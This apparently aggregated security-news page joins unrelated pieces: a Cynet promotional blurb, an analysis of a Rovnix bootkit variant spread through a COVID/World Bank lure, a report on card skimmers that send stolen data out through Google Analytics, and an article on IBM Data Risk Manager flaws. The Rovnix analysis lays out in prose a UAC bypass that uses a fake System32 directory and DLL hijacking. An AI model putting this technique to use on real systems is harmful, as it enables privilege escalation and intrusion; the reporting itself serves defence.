Cynet routinely outperforms third party and open source detection platforms and is frequently relied upon in incident response cases when underlying threats remain hidden from other solutions.

For example, Cynet recently conducted an Incident Response engagement for a large telecom provider. Cynet discovered several malicious files that did not appear in the VirusTotal database. 

Contributing information on these newly discovered files helps our entire industry perform better and protect businesses against cyber-attacks.

Second, Cynet will leverage intelligence in VirusTotal to inform its CyAI model in order to continuously improve its detection capabilities and accuracy.

Cynet AI is continually evolving, constantly learning new datasets in order to improve its accuracy and decrease its already-low false positive ratio. Comparing files found to be malicious by CyAI against files also found to be malicious by other providers helps to quickly validate Cynet’s findings.

For more information about Cynet and the Cynet 360 Platform, click here.

Follow me for more information.

In mid-April, our threat monitoring systems detected malicious files being distributed under the name “on the new initiative of the World Bank in connection with the coronavirus pandemic” (in Russian) with the extension EXE or RAR. Inside the files was the well-known Rovnix bootkit. There is nothing new about cybercriminals exploiting the coronavirus topic; the novelty is that Rovnix has been updated with a UAC bypass tool and is being used to deliver a loader that is unusual for it. Without further ado, let’s proceed to an analysis of the malware according to the rules of dramatic structure.

Exposition: enter SFX archive

The file “on the new initiative of the World Bank in connection with the coronavirus pandemic.exe” is a self-extracting archive that dishes up easymule.exe and 1211.doc.

SFX script

The document does indeed contain information about a new initiative of the World Bank, and real individuals related to the organization are cited as the authors in the metadata.

Contents of 1211.doc

As for easymule.exe, its resources contain a bitmap image that is actually an executable file, which it unpacks and loads into memory.

Loading the “image”

Hook: enter UAC bypass

The code of the PE loaded into memory contains many sections remarkably similar to the known Rovnix bootkit and its modules, the source code of which leaked back in 2013.

Left: source of the malware; right: leaked Rovnix source code (bksetup.c)

However, the file under analysis reveals innovations clearly added by authors, based on the original Rovnix source code. One of them is a UAC bypass mechanism that uses the “mocking trusted directory” technique.

With the aid of the Windows API, the malware creates the directory C:\Windows \System32 (with the space after Windows). It then copies there a legitimate signed executable file from C:\Windows\System32 that has the right to automatically elevate privileges without displaying a UAC request (in this case, wusa.exe).

DLL hijacking is additionally used: a malicious library is placed in the fake directory under the name of one of the libraries imported by the legitimate file (in this case, wtsapi32.dll). As a result, when run from the fake directory, the legitimate file wusa.exe (or rather, the path to it) passes the authorization check due to the GetLongPathNameW API, which removes the space character from the path. At the same time, the legitimate file is run from the fake directory without a UAC request and loads a malicious library called wtsapi.dll.

Besides copying the legitimate system file to the fake directory and creating a malicious library there, the dropper creates another file named uninstall.pdg. After that, the malware creates and runs a series of BAT files that start wusa.exe from the fake directory and then clean up the traces by deleting the created directory and the easymule.exe dropper itself.

Development: enter Rovnix

The file uninstall.pdg clearly contains a packed executable file. It is designed to unpack the same malicious library that was previously downloaded using wusa.exe and DLL hijacking.


The code of the malicious library is kept minimal: the exported function WTSQueryUserToken obviously has no features required by the original wusa.exe, which imports it. Instead, the function reads uninstall.pdg, and unpacks and runs the executable from it.

Code of exported malicious library function

The unpacked uninstall.pdg turns out to be a DLL with the exported function BkInstall — another indicator that the malware is based on the leaked Rovnix code. Further analysis of the file confirms this.

Glued inside uninstall.pdg are executable files packed with aPLib. The gluing was done using the FJ utility (also from the Rovnix bootkit), as evidenced by the file-unpacking algorithm and the FJ signatures indicating the location of the joint in the file.

FJ utility signature

The glued files are the KLoader driver from the leaked Rovnix bootkit and a bootloader. Uninstall.pdg unpacks them, overwrites the VBR with the bootloader, and places the packed original VBR next to it. In addition, KLoader is written to the disk; its purpose is to inject the payload into running processes.

Left: source code of the malware; right: leaked Rovnix source code (kloader.c)

As seen in the screenshot, the source code of the malware is not much different from the original. The original code was seemingly compiled for use without a VFS and a protocol stack for the driver to operate with the network.

In this instance, the driver injects a DLL into the processes, which is that same un-Rovnix-like loader that we spoke about at the very beginning.

Thus, the general execution scheme looks as follows.

Execution scheme

Climax: enter loader

Let’s consider the new loader in more detail. The first thing to catch the eye is the PDB path in the file.

PDB path

When run, the malware first fills the structure with pointers to functions. The allocated memory is filled with pointers to functions, to be called subsequently by their offset in the allocated memory area.

Structure with functions

Next, the process obtains access to the Winsta0 and Default desktop objects for itself and all processes created by this process, and creates a thread with the C&C communication cycle.

Creating a C&C communication thread

Communication with C&C

Having created the thread, the malware checks its presence in the system using OpenMutexA. It then starts a C&C communication cycle, within which a data packet about the infected device is generated. This packet is XOR-encrypted with the single-byte key 0xF7, and sent to C&C.

Structure of sent data

In response, the malware receives an executable file that is loaded into memory. Control is transferred to the entry point of this PE file.

Displaying the PE file loaded into memory

Denouement: enter testing

The loader turns out not to be unique: several more instances were discovered during the analysis. They all have similar features, but with slight differences. For example, one of them checks that it is running properly by trying to register a NetService handler. If it fails (that is, the service is not running in the system), the malware stops working.

Example of a different version of the loader

Other instances of the loader do not use the bootkit, but do apply the same UAC bypass method. All indications are that the loader is currently being actively tested and equipped with various tools to bypass protection.

We also discovered instances that could serve as a payload for a loader. They contain similar PDB paths and the same C&Cs as the loaders. Interestingly, the addresses of the required APIs are got from the function name, which is obtained from the index in the configuration line.

Getting the API addresses

At the command of C&C, this malware can run an EXE file with the specified parameters, record sound from the microphone and send the audio file to the cybercriminals, turn off or restart the computer, and so on.

Processing a received command

The module name (E:\LtdProducts\Project\newproject\64bits\64AllSolutions\Release\PcConnect.pdb) suggests that the developers are positioning it as a backdoor, which could additionally have Trojan-Spy elements, judging by some configuration lines.

Configuration snippet; the lines in Chinese mean “Current user:”, “user password:”, “***Below are the system account and password [%04d-%02d-%02d %02d:%02d:%02d]***”


Our analysis of malware masquerading as a “new initiative of the World Bank” shows that even well-known threats like Rovnix can throw up a couple of surprises when their source code goes public. Freed from the need to develop their own protection-bypassing tools from scratch, cybercriminals can pay more attention to the capabilities of their own malware and add extra “goodies” to the source code, such as UAC bypass. Kaspersky products detect this threat and its related modules as Trojan.Win32.Cidox, Trojan.Win32.Generic, Trojan.Win32.Hesv, and Trojan.Win32.Inject.



Follow me for more information.

Google Analytics

Researchers reported on Monday that hackers are now exploiting Google’s Analytics service to stealthily pilfer credit card information from infected e-commerce sites.

According to several independent reports from PerimeterX, Kaspersky, and Sansec, threat actors are now injecting data-stealing code on the compromised websites in combination with tracking code generated by Google Analytics for their own account, letting them exfiltrate payment information entered by users even in conditions where content security policies are enforced for maximum web security.

“Attackers injected malicious code into sites, which collected all the data entered by users and then sent it via Analytics,” Kaspersky said in a report published yesterday. “As a result, the attackers could access the stolen data in their Google Analytics account.”

The cybersecurity firm said it found about two dozen infected websites across Europe and North and South America that specialized in selling digital equipment, cosmetics, food products, and spare parts.

Bypassing Content Security Policy

The attack hinges on the premise that e-commerce websites using Google’s web analytics service for tracking visitors have whitelisted the associated domains in their content security policy (CSP).

CSP is an added security measure that helps detect and mitigate threats stemming from cross-site scripting vulnerabilities and other forms of code injection attacks, including those embraced by various Magecart groups.

The security feature allows webmasters to define a set of domains the web browser should be allowed to interact with for a specific URL, thereby preventing the execution of untrusted code.

credit card hacking

“The source of the problem is that the CSP rule system isn’t granular enough,” PerimeterX’s VP of research Amir Shaked said. “Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data (in this case, the user’s email address and password).”

To harvest data using this technique, all that is needed is a small piece of JavaScript code that transmits the collected details like credentials and payment information through an event and other parameters that Google Analytics uses to uniquely identify different actions performed on a site.

“Administrators write * into the Content-Security-Policy header (used for listing resources from which third-party code can be downloaded), allowing the service to collect data. What’s more, the attack can be implemented without downloading code from external sources,” Kaspersky noted.

To make the attacks more covert, the attackers also ascertain if developer mode — a feature that’s often used to spot network requests and security errors, among other things — is enabled in the visitor’s browser, and proceed only if the result of that check is negative.

A “Novel” Campaign Since March

In a separate report released yesterday, Netherlands-based Sansec, which tracks digital skimming attacks, uncovered a similar campaign since March 17 that delivered the malicious code on several stores using a JavaScript code that’s hosted on Google’s Firebase.

For obfuscation, the actor behind the operation created a temporary iFrame to load an attacker-controlled Google Analytics account. The credit card data entered on payment forms is then encrypted and sent to the analytics console from where it’s recovered using the encryption key earlier used.

Given the widespread use of Google Analytics in these attacks, countermeasures like CSP will not work if attackers take advantage of an already allowed domain to hijack sensitive information.

google analytics

“A possible solution would come from adaptive URLs, adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts,” Shaked concluded.

“A more granular future direction for strengthening CSP direction to consider as part of the CSP standard is XHR proxy enforcement. This will essentially create a client-side WAF that can enforce a policy on where specific data field[s] are allowed to be transmitted.”

As a customer, unfortunately, there isn’t much you can do to safeguard yourself from formjacking attacks. Turning on developer mode in browsers can help when making online purchases.

But it’s essential that you watch out for any instances of unauthorized purchases or identity theft.

Follow me for more information.

IBM is under fire for refusing to patch critical vulnerabilities in its Data Risk Manager product until exploit code was publicly disclosed.

In what seems a shortsighted move, when a proactive approach may have been better, Big Blue turned down a privately disclosed report of flaws in its enterprise security software – only to issue fixes after details of the holes emerged online.

Three of the four vulnerabilities – CVE-2020-4427, CVE-2020-4428, and CVE-2020-4429 – can be combined to potentially achieve unauthenticated remote code execution as root on vulnerable installations. This is possible if the user account a3user‘s default password of idrm has not been changed, and administrators are not prompted to do so. The fourth vulnerability, CVE-2020-4430, can be abused to download arbitrary files from the system.

They were discovered by Pedro Ribeiro of Agile Information Security, who privately tipped off IBM of the weaknesses. When Big Blue snubbed his report, he went public with the details on April 21, and his exploit code was added to the popular Metasploit framework a few days later for anyone to use. About a week later, on May 7, the IT titan issued versions and of Data Risk Manager said to address the reported flaws.

IBM also told customers that, for the exploit to work, SAML authentication needed to be enabled, and this is not enabled by default. Ribeiro said this claim was “total bull****” because, according to his research, the authentication method is enabled on production deployments.

When Ribeiro earlier tried to coordinate disclosure with IBM and the US govt-funded CERT Coordination Center, he said Big Blue responded by saying the software was out of scope for its HackerOne-hosted bug-bounty program, due to being in extended support mode:

Ribeiro said he wasn’t interested in a bounty – not that Big Blue pays out actual cash for reported flaws – rather, he just wanted IBM to take his findings seriously and address the programming blunders in its product.

“This is an unbelievable response by IBM, a multi-billion dollar company that is selling security enterprise products and security consultancy to huge corporations worldwide,” Ribeiro thundered this month. “They refused to accept a free high-quality vulnerability report on one of their products.

“I did not ask or expect a bounty since I do not have a HackerOne account and I don’t agree with HackerOne’s or IBM’s disclosure terms there. I simply wanted to disclose these to IBM responsibly and let them fix it.”

That refusal led to Ribeiro emitting, essentially, zero-day exploits for IBM’s Data Risk Manager, which spurred the tech giant into addressing its flawed code.

“IBM’s DRM is an enterprise security product that handles very sensitive information,” he continued. “The hacking of an IDRM appliance might lead to a full-scale company compromise, as it stores credentials to access other security tools, not to mention it contains information about critical vulnerabilities that affect the company.

“Why did IBM refuse to accept a free detailed vulnerability report?”

The Register has asked Big Blue for its side of the story, and we will let you know if it gets back to us. ®

Sponsored: Ransomware has gone nuclear

Follow me for more information.

Product categories


June 2020